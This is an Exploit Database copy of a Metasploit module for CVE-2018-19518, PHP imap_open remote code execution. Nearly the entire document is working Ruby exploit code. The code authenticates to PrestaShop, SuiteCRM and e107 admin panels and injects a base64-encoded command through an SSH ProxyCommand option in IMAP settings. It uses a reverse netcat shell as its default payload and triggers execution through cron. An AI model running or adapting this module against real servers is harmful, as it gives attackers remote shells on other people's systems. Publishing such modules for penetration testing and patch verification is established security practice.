PHP imap_open – Remote Code Execution (Metasploit)

• Exploit Database
• 15 阅读

• 作者： Metasploit
  日期： 2018-11-29
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/45914/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'php imap_open Remote Code Execution',
  'Description' => %q{
  The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an
  IMAP session.On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary.Ssh's ProxyCommand
  option can be passed from imap_open to execute arbitrary commands.
  While many custom applications may use imap_open, this exploit works against the following applications:
  e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.
  Prestashop exploitation requires the admin URI, and administrator credentials.
  suiteCRM/e107/hostcms require administrator credentials.
  },
  'Author' =>
  [
  'Anton Lopanitsyn', # Vulnerability discovery and PoC
  'Twoster', # Vulnerability discovery and PoC
  'h00die' # Metasploit Module
  ],
  'License' => MSF_LICENSE,
  'References'=>
  [
  [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],
  [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ],
  [ 'EDB', '45865'],
  [ 'URL', 'https://bugs.php.net/bug.php?id=76428'],
  [ 'CVE', '2018-19518']
  ],
  'Privileged'=> false,
  'Platform'=> [ 'unix' ],
  'Arch'=> ARCH_CMD,
  'Targets' =>
  [
  [ 'prestashop', {} ],
  [ 'suitecrm', {}],
  [ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron
  [ 'custom', {'WfsDelay' => 300}]
  ],
  'PrependFork' => true,
  'DefaultOptions' =>
  {
  'PAYLOAD' => 'cmd/unix/reverse_netcat',
  'WfsDelay' => 120
  },
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Oct 23 2018'))
  
  register_options(
  [
  OptString.new('TARGETURI', [ true, "Base directory path", '/admin2769gx8k3']),
  OptString.new('USERNAME', [ false, "Username to authenticate with", '']),
  OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
  ])
  end
  
  def check
   if target.name =~ /prestashop/
  uri = normalize_uri(target_uri.path)
  res = send_request_cgi({'uri' => uri})
  if res && (res.code == 301 || res.code == 302)
   return CheckCode::Detected
  end
  elsif target.name =~ /suitecrm/
  #login page GET /index.php?action=Login&module=Users
  vprint_status('Loading login page')
  res = send_request_cgi(
  'uri' => normalize_uri(target_uri.path, 'index.php'),
  'vars_get' => {
  'action' => 'Login',
  'module' => 'Users'
  }
  )
  unless res
  print_error('Error loading site.Check options.')
  return
  end
  
  if res.code = 200
  return CheckCode::Detected
  end
   end
   CheckCode::Safe
  end
  
  def command(spaces='$IFS$()')
  #payload is base64 encoded, and stuffed into the SSH option.
  enc_payload = Rex::Text.encode_base64(payload.encoded)
  command = "-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`"
  #final payload can not contain spaces, however $IFS$() will return the space we require
  command.gsub!(' ', spaces)
  end
  
  def exploit
  if target.name =~ /prestashop/
  uri = normalize_uri(target_uri.path)
  res = send_request_cgi({'uri' => uri})
  if res && res.code != 301
  print_error('Admin redirect not found, check URI.Should be something similar to /admin2769gx8k3')
  return
  end
  
  #There are a bunch of redirects that happen, so we automate going through them to get to the login page.
  while res.code == 301 || res.code == 302
  cookie = res.get_cookies
  uri = res.headers['Location']
  vprint_status("Redirected to #{uri}")
  res = send_request_cgi({'uri' => uri})
  end
  
  #Tokens are generated for each URL or sub-component, we need valid ones!
  /.*token=(?<token>\w{32})/ =~ uri
  /id="redirect" value="(?<redirect>.*)"\/>/ =~ res.body
  cookie = res.get_cookies
  
  unless token && redirect
  print_error('Unable to find token and redirect URL, check options.')
  return
  end
  
  vprint_status("Token: #{token} and Login Redirect: #{redirect}")
  print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
  res = send_request_cgi(
  'method' => 'POST',
  'uri'=> normalize_uri(target_uri.path, 'index.php'),
  'cookie' => cookie,
  'vars_post' => {
  'ajax' => 1,
  'token' => '',
  'controller' => 'AdminLogin',
  'submitLogin' => '1',
  'passwd' => datastore['PASSWORD'],
  'email' => datastore['USERNAME'],
  'redirect' => redirect
  },
  'vars_get' => {
  'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated
  }
  )
  if res && res.body.include?('Invalid password')
  print_error('Invalid Login')
  return
  end
  vprint_status("Login JSON Response: #{res.body}")
  uri = JSON.parse(res.body)['redirect']
  cookie = res.get_cookies
  print_good('Login Success, loading admin dashboard to pull tokens')
  res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
  
  /AdminCustomerThreads&token=(?<token>\w{32})/ =~ res.body
  vprint_status("Customer Threads Token: #{token}")
  res = send_request_cgi({
  'uri' => normalize_uri(target_uri.path, 'index.php'),
  'cookie' => cookie,
  'vars_get' => {
  'controller' => 'AdminCustomerThreads',
  'token' => token
  }
  })
  
  /form method="post" action="index\.php\?controller=AdminCustomerThreads&token=(?<token>\w{32})/ =~ res.body
  print_good("Sending Payload with Final Token: #{token}")
  data = Rex::MIME::Message.new
  data.add_part('1', nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_FILE_UPLOAD"')
  data.add_part("Dear Customer,\n\nRegards,\nCustomer service", nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_SIGNATURE_1"')
  data.add_part("x #{command}}", nil, nil, 'form-data; name="PS_SAV_IMAP_URL"')
  data.add_part('143', nil, nil, 'form-data; name="PS_SAV_IMAP_PORT"')
  data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_USER"')
  data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_PWD"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_DELETE_MSG"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_CREATE_THREADS"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_POP3"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NORSH"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_SSL"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_VALIDATE-CERT"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOVALIDATE-CERT"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_TLS"')
  data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOTLS"')
  data.add_part('', nil, nil, 'form-data; name="submitOptionscustomer_thread"')
  
  send_request_cgi(
  'method' => 'POST',
  'uri'=> normalize_uri(target_uri.path, 'index.php'),
  'ctype'=> "multipart/form-data; boundary=#{data.bound}",
  'data' => data.to_s,
  'cookie' => cookie,
  'vars_get' => {
  'controller' => 'AdminCustomerThreads',
  'token' => token
  }
  )
  print_status('IMAP server change left on server, manual revert required.')
  
  if res && res.body.include?('imap Is Not Installed On This Server')
  print_error('PHP IMAP mod not installed/enabled ')
  end
  elsif target.name =~ /suitecrm/
  #login page GET /index.php?action=Login&module=Users
  vprint_status('Loading login page')
  res = send_request_cgi(
  'uri' => normalize_uri(target_uri.path, 'index.php'),
  'vars_get' => {
  'action' => 'Login',
  'module' => 'Users'
  }
  )
  unless res
  print_error('Error loading site.Check options.')
  return
  end
  
  if res.code = 200
  cookie = res.get_cookies
  else
  print_error("HTTP code #{res.code} found, check options.")
  return
  end
  
  vprint_status("Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
  res = send_request_cgi(
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'index.php'),
  'cookie' => cookie,
  'vars_post' => {
  'module' => 'Users',
  'action' => 'Authenticate',
  'return_module' => 'Users',
  'return_action' => 'Login',
  'cant_login' => '',
  'login_module' => '',
  'login_action' => '',
  'login_record' => '',
  'login_token' => '',
  'login_oauth_token' => '',
  'login_mobile' => '',
  'user_name' => datastore['USERNAME'],
  'username_password' => datastore['PASSWORD'],
  'Login' => 'Log+In'
  }
  )
  unless res
  print_error('Error loading site.Check options.')
  return
  end
  
  if res.code = 302
  cookie = res.get_cookies
  print_good('Login Success')
  else
  print_error('Failed Login, check options.')
  end
  
  #load the email settings page to get the group_id
  vprint_status('Loading InboundEmail page')
  res = send_request_cgi(
  'uri' => normalize_uri(target_uri.path, 'index.php'),
  'cookie' => cookie,
  'vars_get' => {
  'module' => 'InboundEmail',
  'action' => 'EditView'
  }
  )
  
  unless res
  print_error('Error loading site.')
  return
  end
  
  /"group_id" value="(?<group_id>\w{8}-\w{4}-\w{4}-\w{4}-\w{12})">/ =~ res.body
  
  unless group_id
  print_error('Could not identify group_id from form page')
  return
  end
  
  print_good("Sending payload with group_id #{group_id}")
  
  referer = "http://#{datastore['RHOST']}#{normalize_uri(target_uri.path, 'index.php')}?module=InboundEmail&action=EditView"
  res = send_request_cgi(
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'index.php'),
  'cookie' => cookie,
  #required to prevent CSRF protection from triggering
  'headers' => { 'Referer' => referer},
  'vars_post' => {
  'module' => 'InboundEmail',
  'record' => '',
  'origin_id' => '',
  'isDuplicate' => 'false',
  'action' => 'Save',
  'group_id' => group_id,
  'return_module' => '',
  'return_action' => '',
  'return_id' => '',
  'personal' => '',
  'searchField' => '',
  'mailbox_type' => '',
  'button' => 'Save',
  'name' => Rex::Text.rand_text_alphanumeric(8),
  'status' => 'Active',
  'server_url' => "x #{command}}",
  'email_user' => Rex::Text.rand_text_alphanumeric(8),
  'protocol' => 'imap',
  'email_password' => Rex::Text.rand_text_alphanumeric(8),
  'port' => '143',
  'mailbox' => 'INBOX',
  'trashFolder' => 'TRASH',
  'sentFolder' => '',
  'from_name' => Rex::Text.rand_text_alphanumeric(8),
  'is_auto_import' => 'on',
  'from_addr' => "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org",
  'reply_to_name' => '',
  'distrib_method' => 'AOPDefault',
  'distribution_user_name' => '',
  'distribution_user_id' => '',
  'distribution_options[0]' => 'all',
  'distribution_options[1]' => '',
  'distribution_options[2]' => '',
  'create_case_template_id' => '',
  'reply_to_addr' => '',
  'template_id' => '',
  'filter_domain' => '',
  'email_num_autoreplies_24_hours' => '10',
  'leaveMessagesOnMailServer' => '1'
  }
  )
  if res && res.code == 200
  print_error('Triggered CSRF protection, may try exploitation manually.')
  end
  print_status('IMAP server config left on server, manual removal required.')
  elsif target.name =~ /e107v2/
  # e107 has an encoder which prevents $IFS$() from being used as $ = &#036;
  # \t also became /t, however "\t" does seem to work.
  
  # e107 also uses a cron job to check bounce jobs, which may not be active.
  # either cron can be disabled, or bounce checks disabled, so we try to
  # kick the process manually, however if it doesn't work we'll hope
  # cron is running and we get a call back anyways.
  
  vprint_status("Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
  res = send_request_cgi(
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'e107_admin', 'admin.php'),
  'vars_post' => {
  'authname' => datastore['USERNAME'],
  'authpass' => datastore['PASSWORD'],
  'authsubmit' => 'Log In'
  })
  unless res
  print_error('Error loading site.Check options.')
  return
  end
  
  if res.code == 302
  cookie = res.get_cookies
  print_good('Login Success')
  else
  print_error('Failed Login, check options.')
  end
  
  
  vprint_status('Checking if Cron is enabled for triggering')
  res = send_request_cgi(
  'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
  'cookie' => cookie
  )
  unless res
  print_error('Error loading site.Check options.')
  return
  end
  if res.body.include? 'Status: <b>Disabled</b>'
  print_error('Cron disabled, unexploitable.')
  return
  end
  
  print_good('Storing payload in mail settings')
  
  # the imap/pop field is hard to find. Check Users > Mail
  # then check "Bounced emails - Processing method" and set it to "Mail account"
  send_request_cgi(
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'e107_admin', 'mailout.php'),
  'cookie' => cookie,
  'vars_get' => {
  'mode' => 'prefs',
  'action' => 'prefs'
  },
  'vars_post' => {
  'testaddress' => 'none@none.com',
  'testtemplate' => 'textonly',
  'bulkmailer' => 'smtp',
  'smtp_server' => '1.1.1.1',
  'smtp_username' => 'username',
  'smtp_password' => 'password',
  'smtp_port' => '25',
  'smtp_options' => '',
  'smtp_keepalive' => '0',
  'smtp_useVERP' => '0',
  'mail_sendstyle' => 'texthtml',
  'mail_pause' => '3',
  'mail_pausetime' => '4',
  'mail_workpertick' => '5',
  'mail_log_option' => '0',
  'mail_bounce' => 'mail',
  'mail_bounce_email2' => '',
  'mail_bounce_email' => "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org",
  'mail_bounce_pop3' => "x #{command("\t")}}",
  'mail_bounce_user' => Rex::Text.rand_text_alphanumeric(8),
  'mail_bounce_pass' => Rex::Text.rand_text_alphanumeric(8),
  'mail_bounce_type' => 'imap',
  'mail_bounce_auto' => '1',
  'updateprefs' => 'Save Changes'
  })
  
  
  vprint_status('Loading cron page to execute job manually')
  res =send_request_cgi(
  'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
  'cookie' => cookie
  )
  
  unless res
  print_error('Error loading site.Check options.')
  return
  end
  
  if /name='e-token' value='(?<etoken>\w{32})'/ =~ res.body && /_system::procEmailBounce.+?cron_execute\[(?<cron_id>\d)\]/m =~ res.body
  print_good("Triggering manual run of mail bounch check cron to execute payload with cron id #{cron_id} and etoken #{etoken}")
  # The post request has several duplicate columns, however all were not required.Left them commented for documentation purposes
  send_request_cgi(
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
  'cookie' => cookie,
  'vars_post' => {
  'e-token' => etoken,
  #'e-columns[]' => 'cron_category',
  'e-columns[]' => 'cron_name',
  #'e-columns[]' => 'cron_description',
  #'e-columns[]' => 'cron_function',
  #'e-columns[]' => 'cron_tab',
  #'e-columns[]' => 'cron_lastrun',
  #'e-columns[]' => 'cron_active',
  "cron_execute[#{cron_id}]" => '1',
  'etrigger_batch' => ''
  })
  
  else
  print_error('e-token not found, required for manual exploitation.Wait 60sec, cron may still trigger.')
  end
  
  print_status('IMAP server config left on server, manual removal required.')
  elsif target.name =~ /custom/
  print_status('Listener started for 300 seconds')
  print_good("POST request connection string: x #{command}}")
  # URI.encode leaves + as + since that's a space encoded.So we manually change it.
  print_good("GET request connection string: #{URI.encode("x " + command + "}").sub! '+', '%2B'}")
  end
  end
  end